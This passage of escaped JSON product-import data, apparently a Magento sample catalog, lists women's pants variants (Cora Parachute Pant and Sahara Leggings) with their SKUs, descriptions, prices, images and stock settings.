,\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Parachute|Track Pants\",\"material\":\"LumaTech&trade;|Nylon|Spandex\",\"pattern\":\"Color-Blocked\",\"climate\":\"Indoor|Hot|Mild|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1787\":{\"sku\":\"WP04-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant-28-Black\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cora-parachute-pant-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1788\":{\"sku\":\"WP04-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant-28-Blue\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cora-parachute-pant-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp04-blue_alt1.jpg,\\/w\\/p\\/wp04-blue_alternate.jpg,\\/w\\/p\\/wp04-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp04-blue_alt1.jpg,\\/w\\/p\\/wp04-blue_alternate.jpg,\\/w\\/p\\/wp04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1789\":{\"sku\":\"WP04-28-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant-28-White\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cora-parachute-pant-28-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"White\"},\"1790\":{\"sku\":\"WP04-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant-29-Black\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cora-parachute-pant-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1791\":{\"sku\":\"WP04-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant-29-Blue\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cora-parachute-pant-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp04-blue_alt1.jpg,\\/w\\/p\\/wp04-blue_alternate.jpg,\\/w\\/p\\/wp04-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp04-blue_alt1.jpg,\\/w\\/p\\/wp04-blue_alternate.jpg,\\/w\\/p\\/wp04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1792\":{\"sku\":\"WP04-29-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant-29-White\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cora-parachute-pant-29-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"White\"},\"1793\":{\"sku\":\"WP04\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cora Parachute Pant\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Parachute|Track Pants,material=LumaTech&trade;|Nylon|Spandex,pattern=Solid,climate=Indoor|Hot|Mild|Spring|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP04-28-Black,size=28,color=Black|sku=WP04-28-Blue,size=28,color=Blue|sku=WP04-28-White,size=28,color=White|sku=WP04-29-Black,size=29,color=Black|sku=WP04-29-Blue,size=29,color=Blue|sku=WP04-29-White,size=29,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp04-blue_alt1.jpg,\\/w\\/p\\/wp04-blue_alternate.jpg,\\/w\\/p\\/wp04-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp04-blue_alt1.jpg,\\/w\\/p\\/wp04-blue_alternate.jpg,\\/w\\/p\\/wp04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Parachute|Track Pants\",\"material\":\"LumaTech&trade;|Nylon|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Hot|Mild|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1794\":{\"sku\":\"WP05-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings-28-Blue\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sahara-leggings-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1795\":{\"sku\":\"WP05-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Sahara Leggings-28-Gray\",\"description\":\"<p>Contrast colors, full-length leggings, and opaque, high-stretch fabric define the Sahara. Flat-locked seams and quick-drying wicking properties prevent chafing. A deep elasticated waistband and carefully positioned seamlines create a flattering silhouette.<\\/p>\\n<p>&bull; Pinstripe legging with rouched ankles.<br \\/>&bull; Secret pocket at waistband.<br \\/>&bull; Flat seams for comfort.<br \\/>&bull; Shaped fit with low rise.<br \\/>&bull; 4-way stretch, moisture-wicking material.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 